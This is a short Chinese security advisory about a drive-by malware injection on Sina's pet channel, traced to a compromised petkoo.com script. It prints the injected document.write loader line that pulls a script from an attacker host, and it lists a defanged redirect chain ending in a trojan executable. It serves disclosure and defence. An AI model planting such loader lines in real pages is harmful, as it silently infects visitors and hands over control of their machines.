注册
登录
| 关键词: hxxp frame cn csa eeq 新浪 htm petkoo com 08 |
接到网友举报称新浪宠物频道(hxxp://pet.sina.com.cn/)被植入恶意代码。经知道创宇安全团队确认,此次挂马事件的起因是由于宠酷网被挂马,而被挂页面经新浪宠物频道引用。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:hxxp://poke.petkoo.com/member/js/1.js 该脚本尾部被植入恶意代码: document.write(’<script src=hxxp://google.08.cn/js/O8.js?sohu></script>’) 挂马分析: [wide]hxxp://pet.sina.com.cn/ [frame]hxxp://www.petkoo.com/index/right.shtml [frame]hxxp://bj.sina.com.cn/petkoo/4.html [frame]hxxp://poke.petkoo.com/member/indexlogin.aspx [script]hxxp://poke.petkoo.com/member/js/1.js [script]hxxp://google.08.cn/js/o8.js?sohu [frame]hxxp://csa22eeq.cn/08/0008.htm?22 [frame]hxxp://csa22eeq.cn/08/index.html [frame]hxxp://csa22eeq.cn/08/ct14.htm [frame]hxxp://csa22eeq.cn/08/ctfl.htm [frame]hxxp://csa22eeq.cn/08/z.htm [frame]hxxp://csa22eeq.cn/08/ctvod.htm [frame]hxxp://csa22eeq.cn/08/ctxxz.htm [frame]hxxp://csa22eeq.cn/08/ctqm.htm [frame]hxxp://csa22eeq.cn/08/ctlb.htm [frame]hxxp://csa22eeq.cn/08/ct122121.htm [script]hxxp://js.tongji.linezing.com/1116244/tongji.js 挂马页面被新浪宠物频道引用: 最终下载病毒文件: hxxp://4534rr232323.cn/q8.exe 通过执行以上病毒文件,来达到完全控制访问者的系统。 知道创宇安全已经于确认挂马后第一时间通知新浪官方处理。 知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:hxxp://www.cert.org.cn/ 推荐的应对方法: 1.安装客户端保护软件。 2.检查更新windows及第三方软件补丁程序。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
